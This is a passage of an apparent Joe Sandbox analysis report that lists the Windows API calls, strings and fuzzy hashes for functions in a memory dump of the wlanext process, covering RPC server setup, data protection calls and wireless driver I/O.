                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07BCE
                                                                                • GetLastError.KERNEL32 ref: 00C07BD4
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07C3D
                                                                                • GetLastError.KERNEL32 ref: 00C07C43
                                                                                • CryptProtectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07CA0
                                                                                • GetLastError.KERNEL32 ref: 00C07CA6
                                                                                • CryptProtectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07D01
                                                                                • GetLastError.KERNEL32 ref: 00C07D07
                                                                                • RpcImpersonateClient.RPCRT4(00000000), ref: 00C07E34
                                                                                • LocalFree.KERNEL32(?,?,00000007,OnexIndicateResult,00000000,00000000), ref: 00C07ED6
                                                                                • LocalFree.KERNEL32(?,?,00000007,OnexIndicateResult,00000000,00000000), ref: 00C07EEF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CryptDataErrorLast$ClientFreeImpersonateLocalProtectUnprotect
                                                                                • String ID: OnexIndicateResult$x
                                                                                • API String ID: 2188033239-2692651971
                                                                                • Opcode ID: 4cc3719abe3315c2d1d31aafc98eafa4d7e3c020e63c283a4f3c98b7b6e0ec02
                                                                                • Instruction ID: 526f569309f6070ddd169e47fcb1b3275fb0a175caba641ac1c0aec2035b922b
                                                                                • Opcode Fuzzy Hash: 4cc3719abe3315c2d1d31aafc98eafa4d7e3c020e63c283a4f3c98b7b6e0ec02
                                                                                • Instruction Fuzzy Hash: C2E16BB1D04249AFDF19DFD4C884AEEBBB9BF04340F14456AE521A72A1D370AE85DF50
                                                                                APIs
                                                                                • RpcStringBindingComposeW.RPCRT4(?,ncalrpc,00000000,00000000,Security=Impersonation Dynamic False,?), ref: 00C0B02D
                                                                                • RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 00C0B075
                                                                                • RpcEpResolveBinding.RPCRT4(?,?), ref: 00C0B0AE
                                                                                • RpcBindingSetOption.RPCRT4(?,0000000B,00000001), ref: 00C0B0EB
                                                                                • RpcMgmtInqServerPrincNameW.RPCRT4(?,0000000A,?), ref: 00C0B12A
                                                                                • RpcBindingSetAuthInfoExW.RPCRT4(?,?,00000006,0000000A,00000000,00000000,?), ref: 00C0B1A4
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • RpcBindingSetAuthInfoW.RPCRT4(?,?,00000006,0000000A,00000000,00000000), ref: 00C0B1DA
                                                                                • RpcStringFreeW.RPCRT4(00000000,?,?,00000000,00C12520,00C12000), ref: 00C0B220
                                                                                • RpcStringFreeW.RPCRT4(00000000,?,?,00000000,00C12520,00C12000), ref: 00C0B22C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Binding$String$AuthFreeInfo$ComposeFromMessageMgmtNameOptionPrincResolveServerTrace
                                                                                • String ID: Security=Impersonation Dynamic False$ncalrpc
                                                                                • API String ID: 3881596699-2153043788
                                                                                • Opcode ID: 4780ed0b0e55207d91265e6dea173d21d61b7ca70b5ce826cdb663a6d2a07fb0
                                                                                • Instruction ID: 15153c644f399398bcf180fdec1f88d9e0ac5d1c8fd2fb635044a74fbd8a69a5
• Opcode Fuzzy Hash: 4780ed0b0e55207d91265e6dea173d21d61b7ca70b5ce826cdb663a6d2a07fb0
• Instruction Fuzzy Hash: 2681A075940248BEEB25CF54CC49FAFBBB6EB45704F150468FA24A62E1C7B2CE90DB14

APIs
• RtlStringFromGUID.NTDLL ref: 00C0FACA
• RtlNtStatusToDosError.NTDLL ref: 00C0FAD1
• memcpy.MSVCRT ref: 00C0FB16
• RtlFreeUnicodeString.NTDLL(?,?,?,?), ref: 00C0FB2F
• CreateFileW.KERNEL32(\\.\NativeWiFiP,?,00000000,00000000,00000003,40000000,00000000), ref: 00C0FB4C
• GetLastError.KERNEL32(\\.\NativeWiFiP), ref: 00C0FB6A
• BindIoCompletionCallback.KERNEL32 ref: 00C0FB83
• GetLastError.KERNEL32 ref: 00C0FB8D
• CloseHandle.KERNEL32(00000000), ref: 00C0FB93
  • Part of subcall function 00C10411: GetProcessHeap.KERNEL32(00C12000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10419
  • Part of subcall function 00C10411: HeapAlloc.KERNEL32(00000000,00000008,00000000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0), ref: 00C10429
  • Part of subcall function 00C10411: SetLastError.KERNEL32(00000008,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10437
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: Error$Last$HeapString$AllocBindCallbackCloseCompletionCreateFileFreeFromHandleProcessStatusUnicodememcpy
• String ID: \\.\NativeWiFiP$\\.\NativeWiFiP\
• API String ID: 2662263823-3014666177
• Opcode ID: b61dfb7784bf2f6cb1ec75dc9bdce349f37d6ff59aff8e07be3a25e04bd17e2a
• Instruction ID: 8da50c24c331742ee7035dc9cc8867adcbd08f398790e7e9014624cd5e6d51a1
• Opcode Fuzzy Hash: b61dfb7784bf2f6cb1ec75dc9bdce349f37d6ff59aff8e07be3a25e04bd17e2a
• Instruction Fuzzy Hash: 9A31B571900218BBCB219FB5DC44B9EBBB8EF44750F15456AF914E71A0D7B4CB82DB90

APIs
• RpcServerUseProtseqW.RPCRT4(ncalrpc,0000000A,00000000), ref: 00C0BCD7
• RpcServerInqBindings.RPCRT4(00C089A2), ref: 00C0BD1F
• RpcEpRegisterW.RPCRT4(00C089A2,00C089A2,?,IhvExtRpcServer), ref: 00C0BD63
• RpcServerRegisterIfEx.RPCRT4(00C089A2,00000000,00000000,00000028,00000000,00C0BA7B), ref: 00C0BDC0
• RpcServerRegisterAuthInfoW.RPCRT4(00000000,0000000A,00000000,00000000), ref: 00C0BDF9
  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
• RpcEpUnregister.RPCRT4(00C089A2,00C089A2,00000000), ref: 00C0BE46
• RpcServerUnregisterIfEx.RPCRT4(00C089A2,00000000,00000000), ref: 00C0BE5B
• RpcBindingVectorFree.RPCRT4(00C089A2), ref: 00C0BE6F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: Server$Register$Unregister$AuthBindingBindingsFreeInfoMessageProtseqTraceVector
• String ID: IhvExtRpcServer$ncalrpc
• API String ID: 614777719-1482482307
• Opcode ID: e8e937e7b2514245115e769e7eda432e9b15704b2801f6fe3ab9904a19ad4bd4
• Instruction ID: db9600e70050b3cb063c865bc62556e592414d4c5f8e67d04dc473e23dd25232
• Opcode Fuzzy Hash: e8e937e7b2514245115e769e7eda432e9b15704b2801f6fe3ab9904a19ad4bd4
• Instruction Fuzzy Hash: 7C51AE34548384BEEB25CF65CC8CFDEBEA6AB06744F094059FA21962E1C371CE94DB14

APIs
  • Part of subcall function 00C10411: GetProcessHeap.KERNEL32(00C12000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10419
  • Part of subcall function 00C10411: HeapAlloc.KERNEL32(00000000,00000008,00000000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0), ref: 00C10429
  • Part of subcall function 00C10411: SetLastError.KERNEL32(00000008,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10437
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000008,00000000,00000000,SetDefaultKeyId), ref: 00C0FBF5
• NtDeviceIoControlFile.NTDLL ref: 00C0FC16
• NtWaitForSingleObject.NTDLL ref: 00C0FC2B
• CloseHandle.KERNEL32(?), ref: 00C0FC3D
• RtlNtStatusToDosError.NTDLL ref: 00C0FC84
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: ErrorHeap$AllocCloseControlCreateDeviceEventFileHandleLastObjectProcessSingleStatusWait
• String ID: SetDefaultKeyId
• API String ID: 2851205432-2492053462
• Opcode ID: f6a884f34c34670014533c68a15e0635d6e448e9604013e46200b5b12a1e17c7
• Instruction ID: 1a030003f66285839e6acd6c2506e16831cc938a580c22b51b9dbfd90c77aae5
• Opcode Fuzzy Hash: f6a884f34c34670014533c68a15e0635d6e448e9604013e46200b5b12a1e17c7
• Instruction Fuzzy Hash: F131A535600128BFEB219F64CC89BAEBB79FB49751F154428FD11D7290D7709D82DBA0

APIs
  • Part of subcall function 00C10411: GetProcessHeap.KERNEL32(00C12000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10419
  • Part of subcall function 00C10411: HeapAlloc.KERNEL32(00000000,00000008,00000000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0), ref: 00C10429
  • Part of subcall function 00C10411: SetLastError.KERNEL32(00000008,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10437
• memcpy.MSVCRT ref: 00C1031F
• memcpy.MSVCRT ref: 00C1033D
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00C12000,00C02A48,00000000,00000000), ref: 00C10351
• NtDeviceIoControlFile.NTDLL ref: 00C10375
• NtWaitForSingleObject.NTDLL ref: 00C1038A
• CloseHandle.KERNEL32(00C02A48), ref: 00C1039C
• RtlNtStatusToDosError.NTDLL ref: 00C103E5
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: ErrorHeapmemcpy$AllocCloseControlCreateDeviceEventFileHandleLastObjectProcessSingleStatusWait
• String ID:
• API String ID: 3829266998-0
• Opcode ID: 6f155ffe2841dd5db81f560f9acd41f3b548975296837f130d74b1625e6fd67d
• Instruction ID: 8f55d10446caaed231ca5921956c123515aee2665d1fc6f28bd6fe2afcb710bf
• Opcode Fuzzy Hash: 6f155ffe2841dd5db81f560f9acd41f3b548975296837f130d74b1625e6fd67d
• Instruction Fuzzy Hash: 9551C171600605AFCB24DF68CCC9BEFBBB5EB89300B644529F922D7251D7B0D980DB60

APIs
• memset.MSVCRT ref: 00C0FE30
• memcpy.MSVCRT ref: 00C0FE82
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,SetDefaultKey,00000000,00000000), ref: 00C0FE94
• NtDeviceIoControlFile.NTDLL ref: 00C0FEB7
• NtWaitForSingleObject.NTDLL ref: 00C0FECA
• CloseHandle.KERNEL32(00000000), ref: 00C0FEDA
• RtlNtStatusToDosError.NTDLL ref: 00C0FF00
• SetLastError.KERNEL32(00000000), ref: 00C0FF07
• GetLastError.KERNEL32 ref: 00C0FF0D
• RtlNtStatusToDosError.NTDLL ref: 00C0FF21
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: Error$LastStatus$CloseControlCreateDeviceEventFileHandleObjectSingleWaitmemcpymemset
• String ID:
• API String ID: 1185699691-0
• Opcode ID: 5cca5f801921e455b3834bc9a93feae870486003b5630d55bab74c0701b4936b
• Instruction ID: 20c016318006199e00fc72f414bfa87623e9686ce7e00cd35a91600b3c48efa4
• Opcode Fuzzy Hash: 5cca5f801921e455b3834bc9a93feae870486003b5630d55bab74c0701b4936b
• Instruction Fuzzy Hash: 6A41C272900115AFCB21DFA8DC84A9FBBB8EF89710F154069F915E7351D3709D81DBA0

APIs
• memset.MSVCRT ref: 00C0FF82
• memcpy.MSVCRT ref: 00C0FFD6
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00C0FFE8
• NtDeviceIoControlFile.NTDLL ref: 00C1000C
• NtWaitForSingleObject.NTDLL ref: 00C10021
• CloseHandle.KERNEL32(?), ref: 00C10033
• RtlNtStatusToDosError.NTDLL ref: 00C10059
• SetLastError.KERNEL32(00000000), ref: 00C10060
• GetLastError.KERNEL32 ref: 00C10066
• RtlNtStatusToDosError.NTDLL ref: 00C1007A
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: Error$LastStatus$CloseControlCreateDeviceEventFileHandleObjectSingleWaitmemcpymemset
• String ID:
• API String ID: 1185699691-0
• Opcode ID: 3fdb3a8f333c6d490fef1a0af90daad3a3c7b81156ceb621ade5634d7026d4ee
• Instruction ID: bd8367dee7e38bf2602efb3e6747a1ed020e2dd937c1b14ab4a8bc556637d21f
• Opcode Fuzzy Hash: 3fdb3a8f333c6d490fef1a0af90daad3a3c7b81156ceb621ade5634d7026d4ee
• Instruction Fuzzy Hash: A2417071900214AFCB15DF68C884AAEFBB9FF89310B158169FD15EB211D7709E80DBA0

APIs
• memset.MSVCRT ref: 00C0FCFC
• memcpy.MSVCRT ref: 00C0FD22
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000004,00000000,00000000), ref: 00C0FD34
• NtDeviceIoControlFile.NTDLL ref: 00C0FD56
• NtWaitForSingleObject.NTDLL ref: 00C0FD6B
• CloseHandle.KERNEL32(00000000), ref: 00C0FD7D
• RtlNtStatusToDosError.NTDLL ref: 00C0FDA3
• SetLastError.KERNEL32(00000000,?,?,00000004,00000000,00000000), ref: 00C0FDAA
• GetLastError.KERNEL32(?,?,00000004,00000000,00000000), ref: 00C0FDB0
• RtlNtStatusToDosError.NTDLL ref: 00C0FDC4
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: Error$LastStatus$CloseControlCreateDeviceEventFileHandleObjectSingleWaitmemcpymemset
• String ID:
• API String ID: 1185699691-0
• Opcode ID: 3fbb66f8df97f416c31e7dd182f0dc50176ef8f44a8ef4d9cf326bac010809e1
• Instruction ID: 638c23fbdbc75bd0b6cd1da49d6264321a4d913cc445eb756860c0ceb99d14af
• Opcode Fuzzy Hash: 3fbb66f8df97f416c31e7dd182f0dc50176ef8f44a8ef4d9cf326bac010809e1
• Instruction Fuzzy Hash: CA41BF31900215AFDB25AF64CC88AAEBBB9EB85300B15046DFD52E7291E6709D91DBA0

APIs
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,NicSpecificExtension), ref: 00C100B5
• NtDeviceIoControlFile.NTDLL ref: 00C100D9
• NtWaitForSingleObject.NTDLL ref: 00C100EE
• CloseHandle.KERNEL32(?), ref: 00C10100
• RtlNtStatusToDosError.NTDLL ref: 00C1012F
• SetLastError.KERNEL32(00000000), ref: 00C10136
• GetLastError.KERNEL32 ref: 00C1013C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: Error$Last$CloseControlCreateDeviceEventFileHandleObjectSingleStatusWait
• String ID: NicSpecificExtension
• API String ID: 537682033-2025226827
• Opcode ID: 30fe343808538f93ce6080c4ae7ff0497f917b103290450f4477bbaf62a0cf36
• Instruction ID: 8a159fec038cebe10a9a0d461c2e4cab01fe16fd2fb0a996cf189883a6a6ab39
• Opcode Fuzzy Hash: 30fe343808538f93ce6080c4ae7ff0497f917b103290450f4477bbaf62a0cf36
• Instruction Fuzzy Hash: 8021A235600128BFCB149F65DC48EDFBF7AEF8A7A0B254014F91697210D7709D80EBA0

APIs
• memset.MSVCRT ref: 00C035F9
• LookupPrivilegeValueW.ADVAPI32(00000000,00000004,?), ref: 00C03628
• GetLastError.KERNEL32 ref: 00C03632
• GetCurrentProcess.KERNEL32(00000028,00000004), ref: 00C0364E
• OpenProcessToken.ADVAPI32(00000000), ref: 00C03655
• GetLastError.KERNEL32 ref: 00C0365F
• AdjustTokenPrivileges.ADVAPI32(00000004,00000000,?,00000100,00000000,00000000), ref: 00C036ED
• GetLastError.KERNEL32 ref: 00C036F7
  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
• CloseHandle.KERNEL32(?), ref: 00C03745
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleLookupMessageOpenPrivilegePrivilegesTraceValuememset
• String ID:
• API String ID: 3257177247-0
• Opcode ID: c5e7edcef762e92e18469e025c9fb1fa340a984e11a0aaa2dd9ec0819f15163d
• Instruction ID: f951bfd1059dba14ff5965d1f16bd9c8595f4fd1c02b87271ffd25bcc47ab4f9
• Opcode Fuzzy Hash: c5e7edcef762e92e18469e025c9fb1fa340a984e11a0aaa2dd9ec0819f15163d
• Instruction Fuzzy Hash: 10517DB4A04284BEEF169F98CD48F9DBBBAEB05304F154195F9519A1F1C3B1CB90EB44

APIs
  • Part of subcall function 00C10411: GetProcessHeap.KERNEL32(00C12000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10419
  • Part of subcall function 00C10411: HeapAlloc.KERNEL32(00000000,00000008,00000000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0), ref: 00C10429
  • Part of subcall function 00C10411: SetLastError.KERNEL32(00000008,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10437
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,0000001C,00000000,00000000,00000000,?), ref: 00C101C9
• NtDeviceIoControlFile.NTDLL ref: 00C101EC
• NtWaitForSingleObject.NTDLL ref: 00C10201
• CloseHandle.KERNEL32(?), ref: 00C10213
• RtlNtStatusToDosError.NTDLL ref: 00C1025A
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: ErrorHeap$AllocCloseControlCreateDeviceEventFileHandleLastObjectProcessSingleStatusWait
• String ID:
• API String ID: 2851205432-0
• Opcode ID: 2e2777b77ca6e3b7c4451644fc0acf43f184a4a3f7e5e891066bc4055c442792
• Instruction ID: c14840952f7ec37bce7e084fda778aec07260dd4357d5b2e93194dec3b7135b0
• Opcode Fuzzy Hash: 2e2777b77ca6e3b7c4451644fc0acf43f184a4a3f7e5e891066bc4055c442792
• Instruction Fuzzy Hash: A041E532600114AFDB15CF64CC89BAEBBA6EF89760F298068FD15DB245D6B0DD81DB90

APIs
• RpcBindingToStringBindingW.RPCRT4(?,?), ref: 00C0BACE
• RpcStringBindingParseW.RPCRT4(?,00000000,?,00000000,00000000,00000000), ref: 00C0BB1D
• RpcBindingInqAuthClientW.RPCRT4(?,?,00000000,?,?,00000000), ref: 00C0BBCB
  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
• RpcStringFreeW.RPCRT4(?,?), ref: 00C0BC4B
• RpcStringFreeW.RPCRT4(00000000,?), ref: 00C0BC57
Strings
Memory Dump Source
• Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
Similarity
• API ID: BindingString$Free$AuthClientMessageParseTrace
• String ID: ncalrpc
• API String ID: 4215684144-2983622238
• Opcode ID: 9589657860fa35cd6887934dbe3707839f8e8f662c08f1cd6025d522c061c4a2
• Instruction ID: 56bd19fb71cd022fe9b248786312647039d0b8821e205acc5604a476b7f02d4b
• Opcode Fuzzy Hash: 9589657860fa35cd6887934dbe3707839f8e8f662c08f1cd6025d522c061c4a2
• Instruction Fuzzy Hash: 2E618C70905248AFEB29CF58C848FAEBBBABF05B04F54409AE511962E1C771CF80DB50

APIs
• EnterCriticalSection.KERNEL32(00C124E0,?,00000000,00C01680,?,?,00C04047), ref: 00C081C9
• LeaveCriticalSection.KERNEL32(00C124E0,?,00000000,00C01680,?,?,00C04047), ref: 00C081D6
• RpcMgmtWaitServerListen.RPCRT4 ref: 00C081DC
• EnterCriticalSection.KERNEL32(00C124E0,?,00000000,00C01680,?,?,00C04047), ref: 00C081E6
                                                                                • LeaveCriticalSection.KERNEL32(00C124E0,?,00000000,00C01680,?,?,00C04047), ref: 00C08267
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ListenMessageMgmtServerTraceWait
                                                                                • String ID:
                                                                                • API String ID: 4262553498-0
                                                                                • Opcode ID: d1dc61c7c61b81d1f3c8e85b5307626caf6d54b738ec467a874c5a1321f891b5
                                                                                • Instruction ID: cfa6bf95e8776e07f2afe692e038bdd979825e5ed4e377cf77ee1b8cfb0e6c25
                                                                                • Opcode Fuzzy Hash: d1dc61c7c61b81d1f3c8e85b5307626caf6d54b738ec467a874c5a1321f891b5
                                                                                • Instruction Fuzzy Hash: 3C31B334144644EFEB198F50DD48F8DBBA6BB49304F1581A4F951571F2C7B1CA99EB00
                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00C091BD
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00C091C9
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C091D1
                                                                                • GetTickCount.KERNEL32 ref: 00C091D9
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00C091E5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                • String ID:
                                                                                • API String ID: 1445889803-0
                                                                                • Opcode ID: 1e4f0f2432fef30968af22f6eef328b2447164bd5924789363ac8ed4ba5d042a
                                                                                • Instruction ID: 5b6e140a1e1e1c1922b428b1e07e81400c4ee914c05fc0ab3a2eb6a64ff3895b
                                                                                • Opcode Fuzzy Hash: 1e4f0f2432fef30968af22f6eef328b2447164bd5924789363ac8ed4ba5d042a
                                                                                • Instruction Fuzzy Hash: 8A018B76D002249BCB20EBB9E84C79EF7F8FB4C345F464665E811E7250DB309A51CB90
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C124E0,00C01680,00000000,00C120B0,?,?,00C03866,00C120B0,00C120A0), ref: 00C082E0
                                                                                • LeaveCriticalSection.KERNEL32(00C124E0,?,?,00C03866,00C120B0,00C120A0), ref: 00C08317
                                                                                • LeaveCriticalSection.KERNEL32(00C124E0,?,?,00C03866,00C120B0,00C120A0), ref: 00C08356
                                                                                • RpcMgmtStopServerListening.RPCRT4(00000000), ref: 00C0835E
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterListeningMessageMgmtServerStopTrace
                                                                                • String ID:
                                                                                • API String ID: 4211997807-0
                                                                                • Opcode ID: f22dcc1a9c3a075ed30e30e0d6058559c2456217f16f129d5cd58a784353d1e2
                                                                                • Instruction ID: 1ab609f4a6f324a96f09073240b670b0ea26f135b8a3a136fd13cc5bd6bf0c38
                                                                                • Opcode Fuzzy Hash: f22dcc1a9c3a075ed30e30e0d6058559c2456217f16f129d5cd58a784353d1e2
                                                                                • Instruction Fuzzy Hash: 3F21E470100650AFFB2A4B04DC4CF9ABE56BB4AB48F198194F9415B1F2CB61CE89DB54
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00C092E4
                                                                                • UnhandledExceptionFilter.KERNEL32(00C01C48), ref: 00C092EF
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00C092FA
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C09301
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                • String ID:
                                                                                • API String ID: 3231755760-0
                                                                                • Opcode ID: 36645996932e6e8b35862b2d469dd28af4e6d1bc9e459e6e71283e1db55df8df
                                                                                • Instruction ID: c75a1affd773ffa5ae94b560585bff132182760fd9ada5637e9868aee4b775f9
                                                                                • Opcode Fuzzy Hash: 36645996932e6e8b35862b2d469dd28af4e6d1bc9e459e6e71283e1db55df8df
                                                                                • Instruction Fuzzy Hash: 6521BDBD805284DBC714DF69E984BCC7BA4FB4A324B10D11AEA0883371E3B459A2CF05
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C124E0,?,00C120C0,00C01680,?,?,?,?,00C03F58), ref: 00C0896E
                                                                                • RpcServerListen.RPCRT4(00000001,000004D2,00000001), ref: 00C089B1
                                                                                • LeaveCriticalSection.KERNEL32(00C124E0,?,?,?,?,?,?,?,?,00C03F58), ref: 00C089F5
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveListenMessageServerTrace
                                                                                • String ID:
                                                                                • API String ID: 3976739133-0
                                                                                • Opcode ID: d35b0d9456d84eab3a515a89de8a95185cf505a428730eb461e59e63d1474d1b
                                                                                • Instruction ID: e3060a2ebf981d0310e05d8000904ed8cd80dff7a3fc848c61a2411dc9a84e44
                                                                                • Opcode Fuzzy Hash: d35b0d9456d84eab3a515a89de8a95185cf505a428730eb461e59e63d1474d1b
                                                                                • Instruction Fuzzy Hash: 3D312831640250ABE726EF249C09FAE7A52BB06744F058250FD817B1E3CBB1CDA8D799
                                                                                APIs
                                                                                • RpcEpUnregister.RPCRT4(?,?,00C01C38), ref: 00C0B466
                                                                                • RpcServerUnregisterIfEx.RPCRT4(?,00000000,00000000), ref: 00C0B496
                                                                                • RpcBindingVectorFree.RPCRT4(00C1249C), ref: 00C0B4D9
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
